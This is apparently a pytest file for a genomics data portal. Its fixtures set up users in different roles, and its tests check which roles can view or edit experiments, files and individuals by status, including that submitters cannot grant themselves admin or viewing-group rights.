pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def remc_lab(testapp):
item = {
'name': 'remc-lab',
'title': 'REMC lab',
'status': 'current'
}
return testapp.post_json('/lab', item).json['@graph'][0]
@pytest.fixture
def somelab_w_shared_award(testapp, award):
item = {
'name': 'some-lab',
'title': 'SOME lab',
'status': 'current',
'awards': [award['@id']]
}
return testapp.post_json('/lab', item).json['@graph'][0]
@pytest.fixture
def remc_award(testapp):
item = {
'name': 'remc-award',
'description': 'REMC test award',
'viewing_group': 'Not 4DN',
}
return testapp.post_json('/award', item).json['@graph'][0]
@pytest.fixture
def nofic_award(testapp):
item = {
'name': 'NOFIC-award',
'description': 'NOFIC test award',
'viewing_group': 'NOFIC',
}
return testapp.post_json('/award', item).json['@graph'][0]
@pytest.fixture
def wrangler(testapp):
item = {
'first_name': 'Wrangler',
'last_name': 'Admin',
'email': '<EMAIL>',
'groups': ['admin'],
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def lab_viewer(testapp, lab, award):
item = {
'first_name': 'ENCODE',
'last_name': '<NAME>',
'email': '<EMAIL>',
'lab': lab['name'],
'status': 'current',
'viewing_groups': [award['viewing_group']]
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def award_viewer(testapp, somelab_w_shared_award):
item = {
'first_name': 'SOME',
'last_name': '<NAME>',
'email': '<EMAIL>',
'lab': somelab_w_shared_award['@id'],
'status': 'current',
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
# this user has the 4DN viewing group
@pytest.fixture
def viewing_group_member(testapp, award):
item = {
'first_name': 'Viewing',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
# this user has the NOFIC viewing group
@pytest.fixture
def nofic_group_member(testapp, nofic_award):
item = {
'first_name': 'NOFIC',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [nofic_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def multi_viewing_group_member(testapp, award, nofic_award):
item = {
'first_name': 'Viewing',
'last_name': 'Group',
'email': '<EMAIL>',
'viewing_groups': [award['viewing_group'], nofic_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def remc_submitter(testapp, remc_lab, remc_award):
item = {
'first_name': 'REMC',
'last_name': 'Submitter',
'email': '<EMAIL>',
'submits_for': [remc_lab['@id']],
'viewing_groups': [remc_award['viewing_group']],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
def remote_user_testapp(app, remote_user):
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': str(remote_user),
}
return webtest.TestApp(app, environ)
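# The per-role *_testapp fixtures further below (wrangler_testapp, submitter_testapp,
# lab_viewer_testapp, etc.) all funnel through this helper, e.g.
#     remote_user_testapp(app, wrangler['uuid'])
# so every request made by that client is authenticated as the given REMOTE_USER.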
@pytest.fixture
def revoked_user(testapp, lab, award):
item = {
'first_name': 'ENCODE',
'last_name': 'Submitter',
'email': '<EMAIL>',
'submits_for': [lab['@id']],
'status': 'revoked',
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def other_lab(testapp):
item = {
'title': 'Other lab',
'name': 'other-lab',
}
return testapp.post_json('/lab', item, status=201).json['@graph'][0]
@pytest.fixture
def simple_file(testapp, lab, award, file_formats):
item = {
'uuid': '3413218c-3d86-498b-a0a2-9a406638e777',
'file_format': file_formats.get('fastq').get('@id'),
'paired_end': '1',
'lab': lab['@id'],
'award': award['@id'],
'status': 'uploaded', # avoid s3 upload codepath
}
return testapp.post_json('/file_fastq', item).json['@graph'][0]
@pytest.fixture
def step_run(testapp, lab, award):
software = {
'name': 'do-thing',
'description': 'It does the thing',
'title': 'THING_DOER',
'version': '1.0',
'software_type': "normalizer",
'award': award['@id'],
'lab': lab['@id']
}
sw = testapp.post_json('/software', software, status=201).json['@graph'][0]
analysis_step = {
'name': 'do-thing-step',
'version': 1,
'software_used': sw['@id']
}
return testapp.post_json('/analysis-steps', analysis_step, status=201).json['@graph'][0]
@pytest.fixture
def expt_w_cont_lab_item(lab, remc_lab, award, human_biosample, exp_types):
return {
'lab': lab['@id'],
'award': award['@id'],
'biosample': human_biosample['@id'],
'experiment_type': exp_types['microc']['@id'],
'contributing_labs': [remc_lab['@id']]
}
@pytest.fixture
def wrangler_testapp(wrangler, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, wrangler['uuid'])
@pytest.fixture
def remc_member_testapp(remc_submitter, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, remc_submitter['uuid'])
@pytest.fixture
def submitter_testapp(submitter, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, submitter['uuid'])
@pytest.fixture
def lab_viewer_testapp(lab_viewer, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, lab_viewer['uuid'])
@pytest.fixture
def award_viewer_testapp(award_viewer, app, external_tx, zsa_savepoints):
return remote_user_testapp(app, award_viewer['uuid'])
@pytest.fixture
def viewing_group_member_testapp(viewing_group_member, app, external_tx, zsa_savepoints):
# app for 4DN viewing group member
return remote_user_testapp(app, viewing_group_member['uuid'])
@pytest.fixture
def multi_viewing_group_member_testapp(multi_viewing_group_member, app, external_tx, zsa_savepoints):
    # app with both 4DN and NOFIC viewing groups
return remote_user_testapp(app, multi_viewing_group_member['uuid'])
@pytest.fixture
def nofic_group_member_testapp(nofic_group_member, app, external_tx, zsa_savepoints):
    # app for NOFIC viewing group member
return remote_user_testapp(app, nofic_group_member['uuid'])
@pytest.fixture
def indexer_testapp(app, external_tx, zsa_savepoints):
return remote_user_testapp(app, 'INDEXER')
@pytest.fixture
def iwg_member(testapp):
item = {
'first_name': 'IWG',
'last_name': 'Member',
'email': '<EMAIL>',
'viewing_groups': ['IWG'],
'status': 'current'
}
# User @@object view has keys omitted.
res = testapp.post_json('/user', item)
return testapp.get(res.location).json
@pytest.fixture
def arbitrary_group_member_testapp(iwg_member, app, external_tx, zsa_savepoints):
# app for arbitrary viewing_group member
return remote_user_testapp(app, iwg_member['uuid'])
@pytest.fixture
def bs_item(lab, award):
return {
'biosource_type': 'primary cell',
'lab': lab['@id'],
'award': award['@id'],
'status': 'submission in progress'
}
vg_test_stati = ['planned', 'submission in progress', 'pre-release']
@pytest.mark.parametrize('status', vg_test_stati)
def test_arbitrary_viewing_group_can_view_item_w_viewable_by(
testapp, arbitrary_group_member_testapp, bs_item, iwg_member, status):
# post the item - the award has the 4DN viewing group and nothing related to IWG
bsres = testapp.post_json('/biosource', bs_item, status=201).json['@graph'][0]
# the vg testapp should not be able to get this item
arbitrary_group_member_testapp.get(bsres['@id'], status=403)
# now add viewable by property to the item
vgres = testapp.patch_json(bsres['@id'], {'viewable_by': ['IWG'], "status": status}, status=200)
# now should be able to get for each of the statuses
arbitrary_group_member_testapp.get(vgres.json['@graph'][0]['@id'], status=200)
@pytest.mark.parametrize('status', vg_test_stati)
def test_user_w_vg_cannot_view_item_w_vg_from_award(
testapp, remc_member_testapp, remc_award, bs_item, status):
""" For stati - planned, submission in progress, and pre-release - test that an item
does not have viewing_group prinicipal added via the award so the item cannot be
viewed - this tests for an arbitrary viewing_group, there are other tests for the
special handling of NOFIC and JA items, this test is not for those special cases
"""
    bs_item['award'] = remc_award['@id']  # remc award has the 'Not 4DN' viewing group, as does remc_submitter in the remc app
res = testapp.post_json('/biosource', bs_item, status=201).json['@graph'][0]
remc_member_testapp.get(res['@id'], status=403)
def test_wrangler_post_non_lab_collection(wrangler_testapp):
item = {
'name': 'human',
'scientific_name': 'Homo sapiens',
'taxon_id': '9606',
}
return wrangler_testapp.post_json('/organism', item, status=201)
def test_submitter_cant_post_non_lab_collection(submitter_testapp):
item = {
'name': 'human',
'scientific_name': 'Homo sapiens',
'taxon_id': '9606',
}
return submitter_testapp.post_json('/organism', item, status=403)
def test_submitter_post_update_experiment(submitter_testapp, lab, award, human_biosample, exp_types):
experiment = {'lab': lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=201)
location = res.location
res = submitter_testapp.get(location + '@@testing-allowed?permission=edit', status=200)
assert res.json['has_permission'] is True
assert 'submits_for.%s' % lab['uuid'] in res.json['principals_allowed_by_permission']
submitter_testapp.patch_json(location, {'description': 'My experiment'}, status=200)
def test_submitter_cant_post_other_lab(submitter_testapp, other_lab, award, exp_types):
experiment = {'lab': other_lab['@id'], 'award': award['@id'], 'experiment_type': exp_types['microc']['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=422)
assert res.json['errors'][0]['name'] == 'Schema: lab'
assert "not in user submits_for" in res.json['errors'][0]['description']
def test_wrangler_post_other_lab(wrangler_testapp, other_lab, award, human_biosample, exp_types):
experiment = {'lab': other_lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
wrangler_testapp.post_json('/experiments-hi-c', experiment, status=201)
def test_submitter_view_experiment(submitter_testapp, submitter, lab, award, human_biosample, exp_types):
experiment = {'lab': lab['@id'], 'award': award['@id'],
'experiment_type': exp_types['microc']['@id'], 'biosample': human_biosample['@id']}
res = submitter_testapp.post_json('/experiments-hi-c', experiment, status=201)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_user_view_details_admin(submitter, access_key, testapp):
res = testapp.get(submitter['@id'])
assert 'email' in res.json
def test_users_view_details_self(submitter, access_key, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
assert 'email' in res.json
def test_users_patch_self(submitter, access_key, submitter_testapp):
submitter_testapp.patch_json(submitter['@id'], {})
def test_users_post_disallowed(submitter, access_key, submitter_testapp):
item = {
'first_name': 'ENCODE',
'last_name': 'Submitter2',
'email': '<EMAIL>',
}
submitter_testapp.post_json('/user', item, status=403)
def test_users_cannot_view_other_users_info_with_basic_authenticated(submitter, authenticated_testapp):
authenticated_testapp.get(submitter['@id'], status=403)
def test_users_can_see_their_own_user_info(submitter, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
assert 'title' in res.json
assert 'email' in res.json
def test_users_view_basic_anon(submitter, anontestapp):
anontestapp.get(submitter['@id'], status=403)
def test_users_view_basic_indexer(submitter, indexer_testapp):
res = indexer_testapp.get(submitter['@id'])
assert 'title' in res.json
assert 'email' not in res.json
assert 'access_keys' not in res.json
def test_viewing_group_member_view(viewing_group_member_testapp, experiment_project_release):
return viewing_group_member_testapp.get(experiment_project_release['@id'], status=200)
def test_lab_viewer_view(lab_viewer_testapp, experiment):
lab_viewer_testapp.get(experiment['@id'], status=200)
def test_award_viewer_view(award_viewer_testapp, experiment):
award_viewer_testapp.get(experiment['@id'], status=200)
def test_submitter_patch_lab_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
lab = {'lab': other_lab['@id']}
submitter_testapp.patch_json(res.json['@id'], lab, status=422) # is that the right status?
def test_wrangler_patch_lab_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
lab = {'lab': other_lab['@id']}
wrangler_testapp.patch_json(res.json['@id'], lab, status=200)
def test_submitter_patch_submits_for_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
submits_for = {'submits_for': [res.json['submits_for'][0]['@id']] + [other_lab['@id']]}
submitter_testapp.patch_json(res.json['@id'], submits_for, status=422)
def test_wrangler_patch_submits_for_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
submits_for = {'submits_for': [res.json['submits_for'][0]['@id']] + [other_lab['@id']]}
wrangler_testapp.patch_json(res.json['@id'], submits_for, status=200)
def test_submitter_patch_groups_disallowed(submitter, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
groups = {'groups': res.json.get('groups', []) + ['admin']}
submitter_testapp.patch_json(res.json['@id'], groups, status=422)
def test_wrangler_patch_groups_allowed(submitter, other_lab, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
groups = {'groups': res.json.get('groups', []) + ['admin']}
wrangler_testapp.patch_json(res.json['@id'], groups, status=200)
def test_submitter_patch_viewing_groups_disallowed(submitter, other_lab, submitter_testapp):
res = submitter_testapp.get(submitter['@id'])
vgroups = {'viewing_groups': res.json['viewing_groups'] + ['GGR']}
submitter_testapp.patch_json(res.json['@id'], vgroups, status=422)
def test_wrangler_patch_viewing_groups_allowed(submitter, wrangler_testapp):
res = wrangler_testapp.get(submitter['@id'])
vgroups = {'viewing_groups': res.json['viewing_groups'] + ['Not 4DN']}
wrangler_testapp.patch_json(res.json['@id'], vgroups, status=200)
def test_revoked_user_denied_authenticated(authenticated_testapp, revoked_user):
authenticated_testapp.get(revoked_user['@id'], status=403)
def test_revoked_user_denied_submitter(submitter_testapp, revoked_user):
submitter_testapp.get(revoked_user['@id'], status=403)
def test_revoked_user_wrangler(wrangler_testapp, revoked_user):
wrangler_testapp.get(revoked_user['@id'], status=200)
def test_labs_view_wrangler(wrangler_testapp, other_lab):
labs = wrangler_testapp.get('/labs/', status=200)
assert(len(labs.json['@graph']) == 1)
##############################################
# Permission tests based on different statuses
# Submitter created item and wants to view
@pytest.fixture
def ind_human_item(human, award, lab):
return {
'award': award['@id'],
'lab': lab['@id'],
'organism': human['@id']
}
@pytest.fixture
def file_item(award, lab, file_formats):
return {
'award': award['@id'],
'lab': lab['@id'],
'file_format': file_formats.get('fastq').get('@id'),
'paired_end': '1'
}
@pytest.fixture
def lab_item(lab):
return {
'name': 'test-lab',
'title': 'test lab',
}
def test_submitter_cannot_view_ownitem(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_contributing_lab_member_can_view_item(expt_w_cont_lab_item, submitter_testapp,
remc_member_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/experiment_hi_c', expt_w_cont_lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
# Submitter created item and lab member wants to patch
def test_contributing_lab_member_cannot_patch(expt_w_cont_lab_item, submitter_testapp,
remc_member_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project', 'archived to project',
'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/experiment_hi_c', expt_w_cont_lab_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
remc_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=422)
def test_submitter_can_view_ownitem(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_submitter_cannot_view_ownitem_replaced_using_accession(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_accession = '/' + res.json['@graph'][0]['accession']
submitter_testapp.get(my_accession, status=404)
def test_submitter_can_view_ownitem_replaced_using_uuid(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
    submitter_testapp.get(my_uuid, status=200)
def test_submitter_can_view_ownitem_replaced_using_alias(ind_human_item, submitter_testapp, wrangler_testapp):
# alias will redirect to uuid
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
res_p = wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced", "aliases": ['test:human']}, status=200)
my_alias = '/' + res_p.json['@graph'][0]['aliases'][0]
rep_res = submitter_testapp.get(my_alias, status=301)
# get the landing url, which is /object_type/uuid in this case
landing = rep_res.headers['Location'].replace('http://localhost', '')
submitter_testapp.get(landing, status=200)
def test_submitter_replaced_item_redirects_to_new_one_with_accession(ind_human_item, submitter_testapp, wrangler_testapp):
    # post 2 individuals, change one to replaced, and add its accession to the alternate_accessions
    # field of the second one. This should result in a redirect when the old accession is used
# item that will be replaced (old item)
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
    # patch the old one with 'replaced' status
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# patch new one with alternate accession
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], {"alternate_accessions": [old.json['@graph'][0]['accession']]}, status=200)
# visit old item and assert that it lands on new item
rep_res = submitter_testapp.get(old.json['@graph'][0]['@id'], status=301)
# get the landing url, which includes a 'redirected_from' query param
redir_param = '?' + urlencode({ 'redirected_from' : old.json['@graph'][0]['@id'] })
landing = rep_res.headers['Location'].replace('http://localhost', '')
assert landing == new.json['@graph'][0]['@id'] + redir_param
submitter_testapp.get(landing, status=200)
def test_submitter_replaced_item_doesnot_redirect_to_new_one_with_uuid(ind_human_item, submitter_testapp, wrangler_testapp):
    # post 2 individuals, change one to replaced, and add its accession to the alternate_accessions
    # field of the second one. This should result in a redirect when the old accession is used
# Old item should still be accessible with its uuid
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
old_uuid = '/individuals-human/' + old.json['@graph'][0]['uuid'] + '/'
print(old_uuid)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
    # patch the old one with 'replaced' status
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# patch new one with alternate accession
patch_data = {"alternate_accessions": [old.json['@graph'][0]['accession']]}
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], patch_data, status=200)
# visit old uuid and assert that it lands on old item
submitter_testapp.get(old_uuid, status=200)
def test_submitter_can_not_add_to_alternate_accession_if_not_replaced(ind_human_item, submitter_testapp, wrangler_testapp):
    # an accession whose status is not 'replaced' cannot be added to alternate_accessions
old = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
# item that will replace (new item)
new = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
    # patch the old one with each (non-replaced) status in turn
statuses = ['current', 'released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
for status in statuses:
wrangler_testapp.patch_json(old.json['@graph'][0]['@id'], {"status": status}, status=200)
# try adding the accession to alternate accessions
# should result in conflict (409)
wrangler_testapp.patch_json(new.json['@graph'][0]['@id'], {"alternate_accessions": [old.json['@graph'][0]['accession']]}, status=409)
# Submitter created item and wants to patch
def test_submitter_cannot_patch_statuses(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['deleted', 'current', 'released', 'revoked', 'archived', 'archived to project', 'released to project']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
def test_submitter_can_patch_statuses(ind_human_item, submitter_testapp, wrangler_testapp):
statuses = ['in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=200)
def test_submitter_can_patch_file_statuses(file_item, submitter_testapp, wrangler_testapp):
statuses = ['uploading', 'uploaded', 'upload failed']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '1'}, status=200)
def test_submitter_cannot_patch_file_statuses(file_item, submitter_testapp, wrangler_testapp):
statuses = ['released', 'revoked', 'deleted', 'released to project', 'archived to project', 'archived']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
submitter_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '1'}, status=403)
def test_submitter_cannot_patch_replaced(ind_human_item, submitter_testapp, wrangler_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
# replaced items are not accessible by accession
my_uuid = '/' + res.json['@graph'][0]['uuid']
submitter_testapp.patch_json(my_uuid, {'sex': 'female'}, status=403)
# Submitter created item and lab member wants to view
def test_labmember_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_labmember_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'released to project', 'in review by lab',
'archived', 'archived to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_labmember_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['released', 'revoked', 'released to project', 'uploading', 'uploaded', 'upload failed',
'archived', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_labmember_cannot_view_submitter_item_replaced_accession(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
lab_viewer_testapp.get(res.json['@graph'][0]['@id'], status=404)
def test_labmember_can_view_submitter_item_replaced_uuid(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
lab_viewer_testapp.get(my_uuid, status=200)
# Submitter created item and lab member wants to patch
def test_labmember_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project',
'archived to project', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
# Submitter created item and lab member wants to patch
def test_labmember_cannot_patch_submitter_file(file_item, submitter_testapp, wrangler_testapp, lab_viewer_testapp):
statuses = ['released', 'revoked', 'released to project', 'uploading', 'uploaded',
'upload failed', 'archived', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
lab_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'paired_end': '2'}, status=403)
# person with shared award tests
def test_awardmember_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['deleted']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=403)
# people who share the same award should be able to view items that have not yet been publicly released
def test_awardmember_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'in review by lab', 'pre-release',
'released to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_awardmember_cannot_view_submitter_item_replaced(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
award_viewer_testapp.get(res.json['@graph'][0]['@id'], status=404)
# Submitter created item and lab member wants to patch
def test_awardmember_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, award_viewer_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'in review by lab',
'submission in progress', 'planned', 'archived to project', 'pre-release']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
award_viewer_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
# Submitter created item and project member wants to view
def test_viewing_group_member_cannot_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['deleted', 'in review by lab', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
# Submitter created item and project member wants to view
def test_viewing_group_member_cannot_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['deleted', 'uploading', 'uploaded', 'upload failed', 'pre-release']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=403)
def test_viewing_group_member_can_view_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['current', 'released', 'revoked', 'released to project',
'archived', 'archived to project']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_viewing_group_member_can_view_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['released', 'revoked', 'released to project', 'archived to project']
res = submitter_testapp.post_json('/file_fastq', file_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.get(res.json['@graph'][0]['@id'], status=200)
def test_viewing_group_member_can_view_submitter_item_replaced_with_uuid(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_uuid = '/individuals-human/' + res.json['@graph'][0]['uuid'] + '/'
viewing_group_member_testapp.get(my_uuid, status=200)
def test_viewing_group_member_cannot_view_submitter_item_replaced_with_accession(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": "replaced"}, status=200)
my_accession = '/' + res.json['@graph'][0]['accession']
viewing_group_member_testapp.get(my_accession, status=404)
# Submitter created item and viewing group member wants to patch
def test_viewing_group_member_cannot_patch_submitter_item(ind_human_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['current', 'released', 'revoked', 'archived', 'released to project', 'in review by lab',
'archived to project', 'submission in progress', 'planned']
res = submitter_testapp.post_json('/individual_human', ind_human_item, status=201)
for status in statuses:
wrangler_testapp.patch_json(res.json['@graph'][0]['@id'], {"status": status}, status=200)
viewing_group_member_testapp.patch_json(res.json['@graph'][0]['@id'], {'sex': 'female'}, status=403)
def test_viewing_group_member_cannot_patch_submitter_file(file_item, submitter_testapp, wrangler_testapp, viewing_group_member_testapp):
statuses = ['released', 'revoked', 'archived', 'released to project', 'archived to project',
'uploading', 'uploaded', 'upload failed']
